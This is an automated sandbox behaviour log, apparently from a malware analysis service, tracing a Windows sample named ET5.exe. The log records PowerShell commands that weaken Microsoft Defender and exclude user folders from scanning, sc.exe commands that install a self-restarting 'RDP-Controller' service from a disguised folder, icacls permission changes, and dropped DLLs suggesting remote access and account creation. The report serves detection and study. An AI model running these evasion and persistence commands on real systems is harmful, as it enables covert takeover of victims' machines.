Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
Source: C:\Users\user\Desktop\ET5.exeProcess created: C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe "C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe"
Source: C:\Users\user\Desktop\ET5.exeProcess created: C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exe "C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exe"
Source: C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exeProcess created: C:\Windows\System32\taskkill.exe taskkill.exe /F /FI "SERVICES eq RDP-Controller"
Source: C:\Windows\System32\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exeProcess created: C:\Windows\System32\sc.exe sc.exe stop RDP-Controller
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exeProcess created: C:\Windows\System32\sc.exe sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exeProcess created: C:\Windows\System32\sc.exe sc.exe failure RDP-Controller reset= 1 actions= restart/10000
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exeProcess created: C:\Windows\System32\sc.exe sc.exe start RDP-Controller
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Source: C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exeProcess created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18
Source: C:\Windows\System32\icacls.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exeProcess created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\npX5adYEH7eu.acl
Source: C:\Windows\System32\icacls.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ET5.exeProcess created: C:\Users\user\Desktop\ET5.exe C:\Users\user\Desktop\ET5.exeJump to behavior
Source: C:\Users\user\Desktop\ET5.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\9pfntcc6fev7dp9x4dc.bat"Jump to behavior
Source: C:\Users\user\Desktop\ET5.exeProcess created: C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe "C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe" Jump to behavior
Source: C:\Users\user\Desktop\ET5.exeProcess created: C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exe "C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exeProcess created: C:\Windows\System32\taskkill.exe taskkill.exe /F /FI "SERVICES eq RDP-Controller"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exeProcess created: C:\Windows\System32\sc.exe sc.exe stop RDP-ControllerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exeProcess created: C:\Windows\System32\sc.exe sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignoreJump to behavior
Source: C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exeProcess created: C:\Windows\System32\sc.exe sc.exe failure RDP-Controller reset= 1 actions= restart/10000Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exeProcess created: C:\Windows\System32\sc.exe sc.exe start RDP-ControllerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exeProcess created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exeProcess created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\npX5adYEH7eu.aclJump to behavior
Source: C:\Users\user\Desktop\ET5.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\ET5.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\ET5.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\ET5.exeSection loaded: d3d9.dllJump to behavior
Source: C:\Users\user\Desktop\ET5.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\ET5.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Desktop\ET5.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\ET5.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\ET5.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\ET5.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\Desktop\ET5.exeSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\Desktop\ET5.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\ET5.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\ET5.exeSection loaded: d3d9.dllJump to behavior
Source: C:\Users\user\Desktop\ET5.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\ET5.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Desktop\ET5.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\ET5.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\ET5.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\ET5.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\Desktop\ET5.exeSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\Desktop\ET5.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\ET5.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: apphelp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: cryptbase.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: ntmarta.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: iphlpapi.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: winhttp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: wsock32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: windows.storage.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: wldp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: netapi32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: userenv.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: netutils.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: samcli.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: libi2p.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: wsock32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: cryptsp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: rsaenh.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: samlib.dll
Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exeFile written: C:\Users\user\AppData\Local\Temp\wfpblk.iniJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: ET5.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: ET5.exeStatic file information: File size 17157120 > 1048576
Source: ET5.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0xc32a00
Source: ET5.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x1eb200
Source: ET5.exeStatic PE information: More than 200 imports for user32.dll
Source: Binary string: RfxVmt.pdb source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr
Source: Binary string: RfxVmt.pdbGCTL source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr
Source: rfxvmt.dll.22.drStatic PE information: 0xE004CD23 [Sat Feb 5 03:04:03 2089 UTC]
Source: C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exeCode function: 11_2_00007FF70489FF1F GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,11_2_00007FF70489FF1F
Source: ET5.exeStatic PE information: section name: .didata
Source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe.2.drStatic PE information: section name: .xdata
Source: hstmhco83f64lehv4q0wbzqj3o.exe.2.drStatic PE information: section name: .xdata
Source: main.exe.10.drStatic PE information: section name: .xdata
Source: cnccli.dll.22.drStatic PE information: section name: .xdata
Source: libi2p.dll.22.drStatic PE information: section name: .xdata
Source: evtsrv.dll.22.drStatic PE information: section name: .xdata
Source: termsrv32.dll.22.drStatic PE information: section name: .xdata
Source: rdpctl.dll.22.drStatic PE information: section name: .xdata
Source: samctl.dll.22.drStatic PE information: section name: .xdata
Source: prgmgr.dll.22.drStatic PE information: section name: .xdata
Source: dwlmgr.dll.22.drStatic PE information: section name: .xdata
Source: rVtDGbMQ.22.drStatic PE information: section name: .xdata
Source: gBXHuZY0.22.drStatic PE information: section name: .xdata
Source: 3rVpJMV7.22.drStatic PE information: section name: .xdata
Source: L0FsI2PI.22.drStatic PE information: section name: .xdata
Source: y8J74cEH.22.drStatic PE information: section name: .xdata
Source: rmcjgYnL.22.drStatic PE information: section name: .xdata
Source: fYg6Jeg5.22.drStatic PE information: section name: .xdata
Source: ypqwg32t.22.drStatic PE information: section name: .xdata
Source: C:\Users\user\Desktop\ET5.exeCode function: 0_2_037AF262 push es; retf 0_2_037AF263
Source: C:\Users\user\Desktop\ET5.exeCode function: 0_2_0379124F push ecx; retf 0_2_03791252
Source: C:\Users\user\Desktop\ET5.exeCode function: 0_2_03796761 push esi; ret 0_2_03796763
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8B915521B strlen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,strlen,strlen,GetProcessHeap,HeapAlloc,strlen,NetUserAdd,CreateProfile,22_2_00007FF8B915521B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\L0FsI2PIJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\rVtDGbMQJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\gBXHuZY0Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dllJump to dropped file
Source: C:\Users\user\Desktop\ET5.exeFile created: C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exeJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dllJump to dropped file
